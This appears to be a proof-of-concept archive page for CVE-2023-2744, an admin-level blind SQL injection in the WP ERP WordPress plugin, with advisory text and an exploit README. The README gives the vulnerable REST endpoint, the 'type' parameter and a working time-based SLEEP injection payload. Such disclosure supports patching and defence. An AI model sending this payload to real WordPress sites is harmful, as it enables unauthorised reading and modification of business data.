Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2023-2744 PoC — WP ERP < 1.12.4 - Admin+ SQL Injection

Source
Associated Vulnerability
Title:WP ERP < 1.12.4 - Admin+ SQL Injection (CVE-2023-2744)
Description:The ERP WordPress plugin before 1.12.4 does not properly sanitise and escape the `type` parameter in the `erp/v1/accounting/v1/people` REST API endpoint before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.
Description
Mass CVE-2023-2744
Readme
# Exploit Title: WP Plugins WP ERP <= 1.12.2 - SQL Injection
# Date: 15-10-2023
# Exploit Author: Arvandy
# Software Link: https://wordpress.org/plugins/erp/
# Vendor Homepage: https://wperp.com/
# Version: 1.12.2
# Tested on: Windows, Linux
# CVE: CVE-2023-2744

# Product Description
WP ERP is the first full-fledged ERP (Enterprise Resource Planning) system through which you can simultaneously manage your WordPress site and business from a single platform. WP ERP aims to deliver all your enterprise business requirements with simplicity. With real-time reports and a better way to handle business data, make your operation better managed, away from errors, and prepare your company for the next leap. WP ERP has 3 core modules: HR, CRM, and Accounting, which together make a complete ERP system for any type of business.

# Vulnerability overview:
The WordPress Plugins WP ERP - Accounting module <= 1.12.2 is vulnerable to Blind SQL Injection (time-based) via the TYPE parameter on /wp-json/erp/v1/accounting/v1/people endpoint. This vulnerability could lead to unauthorized data access and modification.

# Proof of Concept:
Affected Endpoint: /wp-json/erp/v1/accounting/v1/people?type=
Affected Parameter: type
payload: customer') AND (SELECT 1 FROM (SELECT SLEEP(3))x) AND ('x'='x

# Recommendation
Upgrade to version 1.12.4
File Snapshot

[4.0K] /data/pocs/6abb9af2e4d655bde478d06188f3043847613432 ├── [1.4K] main.py └── [1.3K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →